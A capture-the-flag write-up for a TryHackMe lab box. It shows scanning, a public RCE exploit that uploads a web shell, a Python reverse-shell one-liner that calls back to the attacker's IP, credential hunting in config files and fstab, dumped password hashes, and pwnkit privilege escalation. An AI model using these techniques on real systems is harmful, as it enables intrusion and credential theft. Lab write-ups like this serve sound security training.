CTF : Zeno

CTF Zeno writeup. Source THM. Announced difficulty level: Medium

Posted by Boula-Bytes on 26 July 2022

CTF : Zeno

Informations

  • IP: 10.10.205.120
  • MYIP: 10.9.85.5

First enumeration

Basics

  • NMAP
console
$ sudo nmap -p22,12340 -A 10.10.205.120
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-25 22:26 CEST
Nmap scan report for 10.10.205.120
Host is up (0.040s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 09:23:62:a2:18:62:83:69:04:40:62:32:97:ff:3c:cd (RSA)
|   256 33:66:35:36:b0:68:06:32:c1:8a:f6:01:bc:43:38:ce (ECDSA)
|_  256 14:98:e3:84:70:55:e6:60:0c:c2:09:77:f8:b7:a6:1c (ED25519)
12340/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: We've got some trouble | 404 - Resource not found
| http-methods: 
|_  Potentially risky methods: TRACE
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (90%), Crestron XPanel control system (90%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.16 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%), Adtran 424RG FTTH gateway (86%), Linux 2.6.32 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   37.96 ms 10.9.0.1
2   38.40 ms 10.10.205.120

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.41 seconds

Vulnerabilities search

I started to explore what we can find on http port 12340 :

console
$ dirsearch -u http://10.10.205.120:12340 -w /usr/share/seclists/Discovery/Web-Content/big.txt

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 20476

Output File: /home/boula/.dirsearch/reports/10.10.205.120-12340/_22-07-25_22-46-39.txt

Error Log: /home/boula/.dirsearch/logs/errors-22-07-25_22-46-39.log

Target: http://10.10.205.120:12340/

[22:46:39] Starting: 
[22:47:29] 301 -  239B  - /rms  ->  http://10.10.205.120:12340/rms/

Task Completed

There is a rms subdir let's see if we could find something there...

console
$ searchsploit restaurant management system
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path
------------------------------------------------------------------------------------- ---------------------------------
Restaurant Management System 1.0 - Remote Code Execution                             | php/webapps/47520.py
------------------------------------------------------------------------------------- ---------------------------------

Exploit

I had to modify the script but after that :

console
$ python2 47520.py http://10.10.205.120:12340/rms/

    _  _   _____  __  __  _____   ______            _       _ _
  _| || |_|  __ \|  \/  |/ ____| |  ____|          | |     (_) |
 |_  __  _| |__) | \  / | (___   | |__  __  ___ __ | | ___  _| |_
  _| || |_|  _  /| |\/| |\___ \  |  __| \ \/ / '_ \| |/ _ \| | __|
 |_  __  _| | \ \| |  | |____) | | |____ >  <| |_) | | (_) | | |_
   |_||_| |_|  \_\_|  |_|_____/  |______/_/\_\ .__/|_|\___/|_|\__|
                                             | |
                                             |_|



Credits : All InfoSec (Raja Ji's) Group
[+] Restaurant Management System Exploit, Uploading Shell
[+] Shell Uploaded. Please check the URL : http://10.10.205.120:12340/rms/images/reverse-shell.php

And now we can send commands : 

console
$ curl 'http://10.10.205.120:12340/rms/images/reverse-shell.php?cmd=id'
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0

So first I launched a pwncat on my box :

shell
pwncat -lp 1234

Then :

http://10.10.205.120:12340/rms/images/reverse-shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.85.5",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Privilege escalation

Enumeration for privesc

console
$ cat /var/www/html/rms/connection/config.php
<?php
    define('DB_HOST', 'localhost');
    define('DB_USER', 'root');
    define('DB_PASSWORD', '-------------');
    define('DB_DATABASE', 'dbrms');
    define('APP_NAME', 'Pathfinder Hotel');
    error_reporting(1);
?>

With this information I connected to mysql and look at the members table : 

console
select * from members;
+-----------+-----------+----------+--------------------------+----------------------------------+-------------+----------------------------------+
| member_id | firstname | lastname | login                    | passwd                           | question_id | answer                           |
+-----------+-----------+----------+--------------------------+----------------------------------+-------------+----------------------------------+
|        15 | Stephen   | Omolewa  | omolewastephen@gmail.com | 81dc9bdb52d04dc20036dbd8313ed055 |           9 | 51977f38bb3afdf634dd8162c7a33691 |
|        16 | John      | Smith    | jsmith@sample.com        | 1254737c076cf867dc53d60a0364f38e |           8 | 9f2780ee8346cc83b212ff038fcdb45a |
|        17 | edward    | zeno     | edward@zeno.com          | 6f72ea079fd65aff33a67a3f3618b89c |           8 | 6f72ea079fd65aff33a67a3f3618b89c |
|        18 | Toto      | Titi     | toto@toto.com            | 3d09baddc21a365b7da5ae4d0aa5cb95 |           9 | 5844a15e76563fedd11840fd6f40ea7b |
+-----------+-----------+----------+--------------------------+----------------------------------+-------------+----------------------------------+
4 rows in set (0.00 sec)

But I didn't manage to crack the hash...

So I decided to search for readable elements owned by edward :

console
$ find / -user edward -readable 2>/dev/null
/mnt/secret-share

This directory is empty but let's look at the /etc/fstab :

console
$ cat /etc/fstab

#
# /etc/fstab
# Created by anaconda on Tue Jun  8 23:56:31 2021
#
# Accessible filesystems, by reference, are maintained under '/dev/disk'
# See man pages fstab(5), findfs(8), mount(8) and/or blkid(8) for more info
#
/dev/mapper/centos-root /   xfs defaults    0 0
UUID=507d63a9-d8cc-401c-a660-bd57acfd41b2   /boot   xfs defaults    0 0
/dev/mapper/centos-swap swap    swap    defaults    0 0
#//10.10.10.10/secret-share /mnt/secret-share   cifs    _netdev,vers=3.0,ro,username=zeno,password=-----------,domain=localdomain,soft  0 0

Now I can su to edward and read user.txt :)

Exploit

This box is quite old so I choose to test pwnkit... and it works :)

console
$ python CVE-2021-4034.py
[+] Creating shared library for exploit code.
[+] Calling execve()
[root@zeno tmp]# cat /root/root.txt

\o/